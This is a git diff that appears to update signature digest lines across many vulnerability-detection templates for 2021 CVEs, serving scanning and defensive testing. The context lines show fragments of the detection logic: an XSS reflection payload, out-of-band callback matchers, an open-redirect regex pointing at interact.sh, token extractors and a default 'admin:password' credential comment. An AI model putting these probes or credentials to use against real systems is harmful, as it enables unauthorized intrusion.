490a0046304402206ddb9907ac3fbf1eacc3fe939a1785405c743b8caa24674eaddfe53ddc69edd402203cfbaae1e1767fdb5b5d0458d8445f28a56ec0a6f4b75d2c6a833e29d2a6457d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202aea00a9788e3e3f5cd03f8e41a5fa237d5a364c40d8dbe612e923bb19fcfcf4022100d8b928879acf6cde1644dfb67a82d6c187dd039f08ef47658f730b224d602943:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 0f4e80e4218..7bd751499a8 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022074c58924b501a62d32abc8d1e8ed55c264d2f1a821d7947181b087bdfcb49d1c022100d0d12d18f14e63bafdb9c270caf01148d1968991272d0ba9631a703065636995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220216d1ea636339d6fe09c8af45d31362780866bb66ae152b4e06306c125d39f670221009715fb3a0baef5a710182c15f17a773ca3cef6f6102588d8cd3338ea47f3cf65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index 7f9f0bc936a..1ed07d0048f 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d38121b2c4881b34c88fcb968e2528d377f1b5a164c639e2ad7aba2b891bc60402203ecb71e736b5f439132f97458b40b4e83e9008a2852604369aeb47bcc2012223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd2eb7d9ed24caebe04f0b6a5238e1c0304abb4d73aef56709c1c14e982cacd0022100c95812b4891e1634241fa3191a7e68fe30e7be6d45c2d204588a708e424c1c13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index a6c360a793a..50197a52971 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022013ff89f50f2e39b32e1e79d70c908157a120e9c68a388bc8c294c416c618176f022100a5ffdf1fab0b25b0a05398b53b1f27b4337629cdb15f9a284f03febde86966c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5f6b5036e9e9b53dea6aa6c1d303596c1b01b57f4d760bec7e75b885f873226022100c2006880753ca978a09fa48daa969241f8d87725d08f2785143718df5a6a659e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index c28ad79f943..6a5882cd77a 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bb3123dca6ef4da83312daff8e454ed40a432158374218ae5e7cb6faec32378e0220194f60d2a0d84d8886ff2f2ec44744345a4b278e5d26ffc07ef8152110bd7f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d866b8ba3dd433a10b1d569310a22bbdf2004a4b62770564ba93bdc2deaa1c850220765111ef196e5b7e4377cf518c272455dcb28c9a1bb867ba8cf51fe69dbe3735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index 45467bb41b7..8ee8da99744 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -42,4 +42,4 @@ http: - '(body == "false ")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100bc3683e1df7742ff75005626ecb3f82b50cf7eadb0a73d4c3fceaa46088a3c330220244bf4b261e018a82e4dd4708921b6dd6afc661b17267b34aa41760925029989:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e4d1e975cb1d68ddb386e0ec5144106e3c4ff61c55fa14b307eb4fe25eb3bf002203544fb42c9b71eb272b89d1352a645098eae1c78be154dc11ae76ea97097e958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index 5339e063baa..e11647da974 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -42,4 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100e356a9125e1c50153ca6a33d9002e3d2fccd777e21e3b7d748d94d015ecfde2b022100d4d3f6112d757c935d614721696aff8a332517334b3f801257887e9badda771a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0891c3281d8e90f756c87d0e2a63bc3e410bb6169b7db565fed3209a398041b022100adf3d914b2275550f31751867aca3c8c02acb96f4407c95c34a3f4db7f0b6396:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32478.yaml b/http/cves/2021/CVE-2021-32478.yaml index 499dd820f7c..5d6a7e7449a 100644 --- a/http/cves/2021/CVE-2021-32478.yaml +++ b/http/cves/2021/CVE-2021-32478.yaml @@ -51,4 +51,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022034ae87c8ed543ddbf6fb7356b07a97b0e3b51b68396b83682cdc3ee7117aae14022100a33f3c02fdd89c0724bebe928c2f8ef6f8ce1489a7486e1b360a078b81a3692c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008c8cd9532a9c92f30b6b7f8e0dc51f9f05b8bd104bb4d27ed09ce0137e0ea250221008474edda7b50f9880ec4191a69dc86db4198cf2de6c9520062dfd767a935cdda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 29533883d5d..f4610e82517 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab13dcd82ecedad2883e5111575617afcd861fc88ccd263fc016760c37ba8e10022100e9e3092e2c1b09c27447081e1440c5e598e96219b69576d7675b73f8287d64a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c986c42af882fec6d522dbe4d9e6be1f754c038995076d604cf642533d96032402201b17b173dd683400b91b9c0c91ead255b38d5fdc596b87341a5d66db2e4dd1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index 15568f5dfb9..43a533fed9d 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220296cfa906b554006dba2b4ebdc8453f43bcb90f50af97bc46cd08659a8a2e9cd02201ac8ba8756b0b0693c17df34282625f66d823d99940655519066bca5ef0a9e1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f4e2950e640873f80bf66009c501b6c78f7a120792379fdb098ea033554005602200756acd524653ecf289df6440b144ab33f7686deeddecb133bf94737be859d1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3287.yaml b/http/cves/2021/CVE-2021-3287.yaml index f406c31bd67..377c6330199 100644 --- a/http/cves/2021/CVE-2021-3287.yaml +++ b/http/cves/2021/CVE-2021-3287.yaml @@ -60,4 +60,4 @@ http: name: version regex: - 'cachestart\/([0-9.]+)\/cacheend' -# digest: 490a0046304402200ad1b76bd84c3488d5de70d10c5ab4301c4f87bdf8f6557b1ab4d8a79a947a7b02207d500e7b1c4cc6b5e74f0c1d91be31418409b93ba7080a1966907c127f2fe9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd93c689cd014619b60839f0fee2785c6717ae4e31e07476df848f6d28f35093022100943c536aa236eb6737a8c56b0f23474805be599837405598699df427fb9adbe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 582f6d48e5a..2176a193ef5 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022064c8a7a2036e44b4ff0f2def19d6c9502be14d5e2b19cef31fc5b71f43cd1b0302210086894db1eaf03a388d6e211ddb2389b3c90b7a37252e45713232f59309fce495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e882baa1a0c535759fc154b2b11315d80d172b06d33924d1cbfe977418146db02206ac316e54db1982f849d9e3742c0f93e1deb4ad7a40435da4543afc17b4234ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index 0f0c90e3edc..2bcb2118a39 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203ae18561b8b53fd9f16120ac250dda0e25f0969c96ce33a99dc9a96bb04df0b8022100bedd4f8ce0d8ab65ec24ce97685cdd0af6244aaa81261e74f52168983aa79558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e965145ea617cf9596d8c1c570befa51200458bf3620fe2f319ad6ac9d206f0022000ee29640c5166731065a02f8243ac2c1dea0fc8a62fb83d7f23f5a79468d138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33044.yaml b/http/cves/2021/CVE-2021-33044.yaml index 0c7bd352078..97dd39afda4 100644 --- a/http/cves/2021/CVE-2021-33044.yaml +++ b/http/cves/2021/CVE-2021-33044.yaml @@ -63,4 +63,4 @@ http: regex: - ',"result":true,"session":"([a-z]+)"\}' part: body -# digest: 4b0a00483046022100f4937b0be71a2e89fa5c8f7909ecf61e62a6e18aec3d61a4dc44e166ddd83b92022100c4e386ec5c234c4bff11f6b14acd624f0a6311e3d0e4e3b0b7fa3391f59b978f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220078fd0d78a6824f67c6c044fee37afd8b2bfe9cb2364e06d0e41a1c678c9f3b4022068f0de7921e2e668f9a5e454da573984d6013258a971669b04dab7c8746e4c11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33045.yaml b/http/cves/2021/CVE-2021-33045.yaml index 9788e6e6185..f9cf0800846 100644 --- a/http/cves/2021/CVE-2021-33045.yaml +++ b/http/cves/2021/CVE-2021-33045.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220015938bd54ac96eee2cf3cc5cf401e1b03166936fce9af5232d32ef6ce44352202203ab6cea1dae5f14a6f96abc7c25f360781f4c9e4e94eb9e537e2c8d3a3e5527c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfd9e78f3058dc98861814cb21986801f66f5a47edfe59d20392a544949742e902202c1141eb36a9307dd6206e11f505519f3248e08f31109609b73a0b9ea521e0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33357.yaml b/http/cves/2021/CVE-2021-33357.yaml index d2b66aecf61..6a97696d4ba 100644 --- a/http/cves/2021/CVE-2021-33357.yaml +++ b/http/cves/2021/CVE-2021-33357.yaml @@ -54,4 +54,4 @@ http: regex: - 'GET \/([a-z-]+) HTTP' part: interactsh_request -# digest: 4a0a004730450220122e50aa2b853bba1b70e0bed1c61bc15408a477ec27b147bb7ef9d43ca09591022100b1470a064d78b863d27287faa693b255e884422eef660db6709875591c9dbc20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068ec0e30affe72d0aa50f2cee0a21d01b811d51194b53c92ee5833711225c24002203d6ba33e6ff6f6194fd87187e69f88623f0b5b236c2fdf2940999e4af715f9aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33558.yaml b/http/cves/2021/CVE-2021-33558.yaml index 99e87b70a0b..234ee251e29 100644 --- a/http/cves/2021/CVE-2021-33558.yaml +++ b/http/cves/2021/CVE-2021-33558.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203050d0856bbaffae5b115f850d525f2180b3a0e4890eaf5464958cf472c9f1f5022079297af6f985adb360b1b49cb6d05bd81f9f3b7e21516e8b2a3cbe59ad0d57b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205161659cf859345041e4cd29ac77115d755d8026f3bf7307c59d80828361731f0220206695890999bf4ae2aa426a1d4e0ad5a945b0c43c661b6c94932b2d6b27c70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index a7bd63e6500..4b93070b75e 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -54,4 +54,4 @@ http: part: body words: - "Could not connect to the CBS" -# digest: 490a0046304402203506b93e9cedc3369ec437961407a580b5dc5782b80e41896ca72dfc8cc97e1f02203eb13f9b2988d1aaf0eb60a012be078709ad11f65e94beb8f82ee8fbfb2671f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202fba127b9f66da829775cb281c22b88812bd93f47791a0e7689d8104add3305c022100a23f9dc3dc8ba69bd2eda309004486ae3b9cfda346973afcf59b2c2b25951156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3377.yaml b/http/cves/2021/CVE-2021-3377.yaml index e01bed5a026..9d5a2d8d40f 100644 --- a/http/cves/2021/CVE-2021-3377.yaml +++ b/http/cves/2021/CVE-2021-3377.yaml @@ -48,4 +48,4 @@ http: - type: word words: - "sh\"/onmouseover=\"alert(1)\">" -# digest: 4a0a00473045022100e2265c36c324a546d38440ecd316ac7cf7ddb2ba064b47f6739a067df751ca7102203f0fec7756424bb0380cb269a82bae0be23b33ca22e4990ee0b6dc44b0c3044f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063a17a3a54f748af4fbbe19603a3197350dfcdde547e492abb5c2725a9c58e3a022100b23773d7cd1ee8d89a1e3e9cf6f9206806c8f6afa23bf6412a11f6391a1668ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33829.yaml b/http/cves/2021/CVE-2021-33829.yaml index 94e387da59f..4fcf557507c 100644 --- a/http/cves/2021/CVE-2021-33829.yaml +++ b/http/cves/2021/CVE-2021-33829.yaml @@ -128,4 +128,4 @@ http: name: node_url kval: - node_url -# digest: 4b0a00483046022100a8880fbd0972efe4747f3b7e16b142866f0fc9da3495946ae7f3251f23b739f9022100dc5def4a8745007f23e56fac5069c6b6f6e71dbf8398592b0c439c8905005bfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022065cc974054e1d97b4005776428a3cfecea074d637ce0bae164c3b1c71468b9ff022100e31d8df895ae4e3477b48873fb3e2a09e6d1418bec7354eb4659beb75d9a2c82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33851.yaml b/http/cves/2021/CVE-2021-33851.yaml index 60f6b0fb625..8e7bc2e4808 100644 --- a/http/cves/2021/CVE-2021-33851.yaml +++ b/http/cves/2021/CVE-2021-33851.yaml @@ -69,4 +69,4 @@ http: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true part: body -# digest: 4a0a004730450220450d919cbb926200a054d0c04f2369b765f7de956af9135c70efab15fdad6b67022100b7b5c7dc3d65c9c8c6f08715700db960a70f10423103ff0c5642a7621b41c952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f43d4c322196634a4ce573c4b75bfaaeaaabfd7770b5d083987e880954601503022100df50291d34bb81cbd55b10536ecf6fb895007a5337d17f0de1df88e881f4fa3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33904.yaml b/http/cves/2021/CVE-2021-33904.yaml index f7fcf561129..66992ac2e69 100644 --- a/http/cves/2021/CVE-2021-33904.yaml +++ b/http/cves/2021/CVE-2021-33904.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b0b2cb7e76bf01ea1faab8eb6dd13303354de1d9811748624b85000538d9299022100e21f7dbc7040033b5415b8a4bfafdcfc1f898a9bebfb604ab300509848b9f1f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204d712aa48eed6c3e0a8f810b0fa01c14cf9d22d8fb3b4fe759384315363668760220359ab8420c9ee5e1ad7032bb8960be7ce0ffad4f1c66fc4719561866064b23fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34370.yaml b/http/cves/2021/CVE-2021-34370.yaml index cdbfe9a3fcd..2168aefc2de 100644 --- a/http/cves/2021/CVE-2021-34370.yaml +++ b/http/cves/2021/CVE-2021-34370.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022011f661ce44a5995b01728bce4fe358f050c809fe4dc32209f1113100857a3db602204399f7fa283f1defdb76ddd3285528740b11251a92d84e3dac506daff1d3c683:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa11b90397c582413afc28a36fee481b992325b87bbb78fb87809040bb785aa002205bd5310655d42fb9aed3b8272aab35f822ec50618e5a48b4f5518ae988edff07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 5b2a8df849b..177779168e2 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -51,4 +51,4 @@ http: - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" - "Exchange MAPI/HTTP Connectivity Endpoint" condition: or -# digest: 490a004630440220629e8a9a7f397efefc6c452281ad9ba23d354716bda6fa39ba1294fd8292cfd30220704005cb8f9a4ad916e8cda2667e8c0706e7c86c37c3b82793927a4fc5d1db26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202eee799d4765340fc542cb9572c63705eb7797fa77051c60f0b5b2dd32583a2c022100d467ce32d0608ed9f8448199670a2cf60aaf1d5951f6e440ecd077fb25098f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34622.yaml b/http/cves/2021/CVE-2021-34622.yaml index 0a0c3931608..cd15d0f0130 100644 --- a/http/cves/2021/CVE-2021-34622.yaml +++ b/http/cves/2021/CVE-2021-34622.yaml @@ -176,4 +176,4 @@ http: - 'email' - 'username' - 'password' -# digest: 490a0046304402201716c795c077da9862df5a32f2be4ba1a4a0a946d960e9cb3aa01c42b4681df202203604620b8478e58f8b24a6216b8cb24ccd93dd9f0dd67b8cce59ab91e155916d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205048396feb2327d0459b395ac7683a777b86ca9e50dc630a6dc2b31f25f80e1a022100e0ac848655e10d86cf2dfa031b45b1af6a06bf37a9c463c37630745fcbdbc6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34624.yaml b/http/cves/2021/CVE-2021-34624.yaml index 0ebe5596ff8..e7a381a30eb 100644 --- a/http/cves/2021/CVE-2021-34624.yaml +++ b/http/cves/2021/CVE-2021-34624.yaml @@ -96,4 +96,4 @@ http: - 'contains(content_type_2, "text/html")' - 'status_code_2 == 200' condition: and -# digest: 4b0a00483046022100cdf35c3f5954d2db69f64d04bb6caf06cb61015613cd5ebd8207195c7f04d21902210090f03f809a395306df99432425503b111c1800f1f2e403b062ff40b7f2e60e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220183db3f752cd10c27fe3dcff2de1e009133bd4610cb5803aaa4e399cc8e4c2ef022100fec7b1e59bbc3815717ef16e6ef26b35b8534743235f9ce36482a5832fbf9342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34640.yaml b/http/cves/2021/CVE-2021-34640.yaml index e8b96dbbba7..01c1c52ed98 100644 --- a/http/cves/2021/CVE-2021-34640.yaml +++ b/http/cves/2021/CVE-2021-34640.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f8b93b0aec8260e99db21546d3a71903eb421c8391c3e914af951a56a8a3db2b022100a834b184f72317ae3d38f19a9b34a55119549d44d4a8b62be122bc7a6cb95c68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1d83326d55ef29b8bcda8a06a51d296d690a5d303f8025ead8e507be82a43d502205adf53f087fe5a982b0d0386a18a63fab199d271a045dd44588f1d4f76348608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34643.yaml b/http/cves/2021/CVE-2021-34643.yaml index 95390957532..559f59484e3 100644 --- a/http/cves/2021/CVE-2021-34643.yaml +++ b/http/cves/2021/CVE-2021-34643.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a9f33fbae7a0c0343fd9f4192530dadfa83c04ae467dfddcc90e501a879c7fcb022027efe8a6c8cff620e0202f53e55beed7e3bd8a74fbfdf6bba542f319535fd96a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200c4fa8854a2f0e505cddffafd9f0a485e6e2858deb3d8a450eb4b0e7c15e314902207864e16538844a09f9359eb94151d10211be92764b48e1eed1bdba2185d14144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 01aa350da52..27ed529e469 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220647f447fc2c6945ef1f9b0c2d84bcd0cda216d3e962d2fbabafbd9638812a5500221008f973a2749d96e08e3b08a2c3a3874d3b2346429529bc31fbebc0e50e7ec6950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c631cc6afb1acc540890cccc21ba0ef5f2fa0b347f93dd0d22b39662fd992f3f022069dde8318a3dbb1f6c275716813e37376e60bad0bc43c919ff20fa2e3aa4a6a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index 13651877c8c..d3e1abbe24c 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -63,4 +63,4 @@ http: regex: - 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"' internal: true -# digest: 4b0a00483046022100d973cd750c291509eaa153f4e242fce91953eb092554303b9b440b6c00e611d4022100865841de8693604cba791627b225f699c6b83f712db8cf6cce04b8341a6a9f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057779cd5030c9e9b172f4ec2b3fbe93cb0b4c93230fc4617e00017f6fbe7567902210088e2cb1a81bb1f6634d87b926cb9b7159dbf57ba5c0a09b5501e5261a2840fa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35336.yaml b/http/cves/2021/CVE-2021-35336.yaml index 2ee14941a2b..91255d4231d 100644 --- a/http/cves/2021/CVE-2021-35336.yaml +++ b/http/cves/2021/CVE-2021-35336.yaml @@ -55,4 +55,4 @@ http: - 200 # admin:password -# digest: 490a004630440220207f948c3379aff95573a9c5e96d94cffd838a4a3e05219b93f721fad84be88602204f8a88f517751b627648e5e01b3d402015293fed378556b737ab5524efe44c91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022079125ec6602a8f5373aea399e9ecb814395738c214dd3a8ea162212464b2c90002201b364c1aa32399c794531d9a7e4ca15e3eb5a58c473f129572f9396924b32f54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index c4d3405f547..ad460323703 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -43,4 +43,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100db3dc3760299702d6f6e6324d76e319a46cd3d1798078cad574559ff47bf294c0220348f8eac21fdff97601cf1e5d4f5aa89dbb4c7f5bd02f53782758dc7352f5cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e231ab7ce520f3b5830c68b49c77b1cf457e6cbf6ef82a67891e45d6f3d66f802201f78c61a757a46e27fc3614b80611b50d80e5b127140b65fb06ef68f5d122473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 9c084325d4c..63f37862288 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 401 -# digest: 490a00463044022010a2152442ec71cbf6f8ab5ba0a770d080998f7f0fe9987627c41359bea1ce65022044fa3ae4696e38d221a640d994bf39aac7aa65d7273771dd714d6feef93547a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab73a46fb8dd53209912b5fa64a6643e0c5286f2288f12e9de916a108a97bf710220290fac6227532f7a9a1e2926e183e4545efe543d222d2491300303d5de8f2965:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index cb8ae678da6..bf6ae50981e 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022070ce262f0d6c277776fb924f3ae8e7dfefad4b1dc755af96ae50317942079a08022023e66fc44fd506f11861abf5ea7549116728160d1907c0b8bacbc0a4b2083d32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210098b74ee280ceac8066f0906444d89b7735dbcc2aad059f6b18da81a5b70cd23102201ca85f32e88caf00fec0b1f2256d73ff827850e9d2dc319c91b274d6aacdc13c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 3b3a3ed9c27..664a0ad8757 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -49,4 +49,4 @@ http: part: body_2 words: - "44f63b292601ec4ab0d8c3244c9f5ebe" -# digest: 4a0a0047304502204f3c593690f4d368f457771cb2014e5566d9085e6d6a958a8652b7db30388734022100ad64e11a0276bd1ffc77111f0ba4bf68cc9299c1683074332f3632a138f352f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f41516bd65276642d0e18aea017259e4a40e861176d92706074ff0a5b89e741c0220500a5809a692893eba5cab57b623bc0e599d2541b7c71b0b753c17b1e37c0b8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index facdb6c1427..98267b7c42b 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -42,4 +42,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502200e6648f95ee6d0be636c375d98a260ab2e3fce44415f936ce784d255c473c608022100ec80fd5af58cd997ac1bf0c0311f9a997c95adc08ad9ca4fb925afaf98d0d17d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041856fb744a9cecddab78d8b34a35d2cee2eff1503d7b796736ad0bb78d0b7b30220103ee513b5efa7c5ddefd240b5f19d2987e246cba882c582c23473dfbbaa126a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index e2b15af6b09..0df1b9160c6 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -46,4 +46,4 @@ http: part: header regex: - 